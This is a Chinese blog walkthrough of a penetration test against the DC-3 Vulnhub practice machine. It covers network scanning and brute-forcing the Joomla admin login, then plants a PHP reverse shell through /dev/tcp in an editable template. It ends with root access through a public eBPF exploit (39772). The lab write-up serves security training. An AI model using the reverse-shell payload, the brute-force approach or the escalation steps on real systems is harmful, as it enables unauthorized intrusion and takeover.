2022春节一次完整的渗透测试-DC-3

简介: 2022春节一次完整的渗透测试-DC-3

DC靶场的下载、安装与访问在上一篇的文章中。

网络异常,图片无法展示
|

靶场攻略:

1、使用nmap快速扫描的命令:

nmap -sP --min-hostgroup 1024 --min-parallelism 1024 192.168.120.0/24

image.gif

识别到靶场主机ip

image.gif编辑

2.使用命令:

nmap -A -p- -T4 192.168.120.135

image.gif

探测靶场突破口

image.gif编辑

如图,可以看到,开放了80端口-http服务

3.访问80端口,寻找进一步突破口。如果直接使用ip访问会跳转到http://dc-2/,而无法正常加载出来。所以需要我们去添加hosts文件,跳转域名来访问靶场ip。

Windows:可以访问本地hosts,打开C:\Windows\System32\drivers\etc,修改hosts文件

image.gif编辑

Linux:在/etc/hosts文件中添加域名。

打开浏览器,访问即可。

image.gif编辑

根据提示只有一个flag,并且需要拿到root权限才能得到。并且可以知道网站的CMS系统是Joomla。

4.使用dirb扫描http://dc-3/

dirb http://dc-3 /usr/share/wordlists/dirb/big.txt

image.gif

image.gif编辑

访问

http://dc-3/administrator/

image.gif

image.gif编辑

5.使用Brup进行爆破账号和密码。

image.gif编辑

image.gif编辑

结果账号是admin,密码是snoopy。登录成功。

image.gif编辑

在首页Templates下发现了线索

image.gif编辑在Templates模版设置中,找到了,可编辑的php模版,这样就好弄了,在模版中添加反弹php的shell的语句,使用nc监听反弹的端口即可

<?php system("bash -c 'bash -i >& /dev/tcp/192.168.120.129/1234 0>&1' ");?>

image.gif

image.gif编辑

image.gif编辑

连接成功。查看文件内容,没有什么发现,直接在进入交互模式。

image.gif编辑

通过收集信息,知道靶场环境系统为ubuntu 16.04,使用searchsploit工具,寻找到合适的提权脚本。

如图,发现可以提权的漏洞利用,查看利用方式。

image.gif编辑

显示漏洞利用的完整路径

searchsploit 39772.txt -p

image.gif

image.gif编辑

将39722.txt文件复制到root目录下,然后查看文件。

cp /usr/share/exploitdb/exploits/linux/local/39772.txt /root

image.gif

image.gif编辑

通过阅读39772.txt的说明,知道需要下载一个提权脚本。image.gif编辑

解压39772.zip

image.gif编辑

unzip 39772.zip

image.gif

image.gif编辑

解压exploit.tar
// cd 39772
//ls
crasher.tar  exploit.tar
//tar -xvf exploit.tar
//ls
crasher.tar  ebpf_mapfd_doubleput_exploit  exploit.tar
//cd ebpf_mapfd_doubleput_exploit                  
//ls
compile.sh  doubleput.c  hello.c  suidhelper.c

image.gif

image.gif编辑

首先运行./compile.sh,得到一个doubleput执行文件,再运行doubleput文件之后,成功提权

执行编译文件
// ./compile.sh
// ./doubleput
//  id                         
uid=0(root) gid=0(root) groups=0(root),33(www-data)
//whoami                    
// cd /root                
//ls
the-flag.txt
// cat the-flag.txt
cat the-flag.txt

image.gif

image.gif编辑

总结

在这个靶场中,用到的知识点有namp,暴力破解,brup软件,web目录扫描,反弹shell,提权,msf以及linux的一些基本命令。

相关文章
|
3月前
|
安全
DC电源模块的安全性能评估与测试方法
DC电源模块的安全性能评估与测试方法 DC电源模块的安全性能评估与测试方法应包括以下几个方面: 1. 输入安全性测试:包括输入电压范围、输入电压稳定性、输入电流范围、输入电流保护等方面的测试。测试方法可以是逐步增加输入电压或输入电流,观察模块的工作状态和保护功能。
DC电源模块的安全性能评估与测试方法
|
3月前
|
安全 测试技术
BOSHIDA DC电源模块的安全性能评估与测试方法
BOSHIDA DC电源模块的安全性能评估与测试方法
 BOSHIDA DC电源模块的安全性能评估与测试方法
|
3月前
|
安全 Shell 网络安全
基于Vulnhub靶场—DC4渗透测试过程
Vulhub是一个开源项目,专注于安全漏洞的复现和学习。包括Web应用、容器和操作系统漏洞。项目特点包括丰富的漏洞场景、详细的复现指南、便捷的环境部署和持续更新。通过Vulhub,安全从业者可以学习和研究漏洞利用技术。此外,文章还介绍了如何下载和搭建Vulhub靶机DC-4,并详细描述了利用Burp Suite进行密码爆破和命令执行,最终获取root权限的过程。
119 0
|
安全 Shell Linux
2022渗透测试-一次完整的渗透测试(DC-6靶场)
2022渗透测试-一次完整的渗透测试(DC-6靶场)
2022渗透测试-一次完整的渗透测试(DC-6靶场)
|
3月前
探讨AC/DC电源模块的可靠性设计和测试方法
探讨AC/DC电源模块的可靠性设计和测试方法
探讨AC/DC电源模块的可靠性设计和测试方法
|
3月前
BOSHIDA AC/DC电源模块的可靠性设计与测试方法
BOSHIDA AC/DC电源模块的可靠性设计与测试方法
BOSHIDA  AC/DC电源模块的可靠性设计与测试方法
|
3月前
|
Shell Linux 网络安全
基于Vulnhub—DC8靶场渗透测试过程
这篇文章描述了一个渗透测试的过程。首先,作者下载了一个名为DC8的靶场环境并将其导入虚拟机软件,将网络设置为NAT或仅主机模式。然后进行了信息收集,通过ARP扫描发现靶机IP,并使用nmap扫描开放端口,发现80和22端口开放。进一步利用SQL注入漏洞,通过sqlmap工具获取了数据库中的用户名和密码
44 0
|
3月前
|
安全 Shell 网络安全
基于Vulnhub靶场之DC-3渗透测试过程
Vulhub靶场介绍: [Vulhub](https://vulhub.org/) 是一个专注于安全漏洞复现和学习的开源项目。它提供了各种常见漏洞的复现环境,帮助网络安全从业者学习和研究漏洞利用技术。这些环境涵盖了Web应用、容器和操作系统等多个领域。Vulhub 的特点包括: 1. **丰富的漏洞场景**:覆盖多种常见的漏洞,如SQL注入、XSS等。 2. **详细复现指南**:为每个漏洞场景提供详细的环境搭建和利用步骤,便于学习和实践。 3. **易于使用**:提供一键部署或Docker镜像,简化环境搭建过程 4. **持续更新与维护**:项目在GitHub上开源,不断接收社区的贡献和更新
140 0
|
10月前
|
存储 网络协议 网络安全
VulnHub靶机DC2渗透测试笔记
靶机下载地址: https://download.vulnhub.com/dc/DC-2.zip 靶机难度:入门 靶机描述:和DC-1 一样,有五个标志,包括最终标志。
64 0
VulnHub靶机DC2渗透测试笔记
|
10月前
|
SQL 安全 Shell
看完这篇 教你玩转渗透测试靶机vulnhub——DC3
看完这篇 教你玩转渗透测试靶机vulnhub——DC3
259 0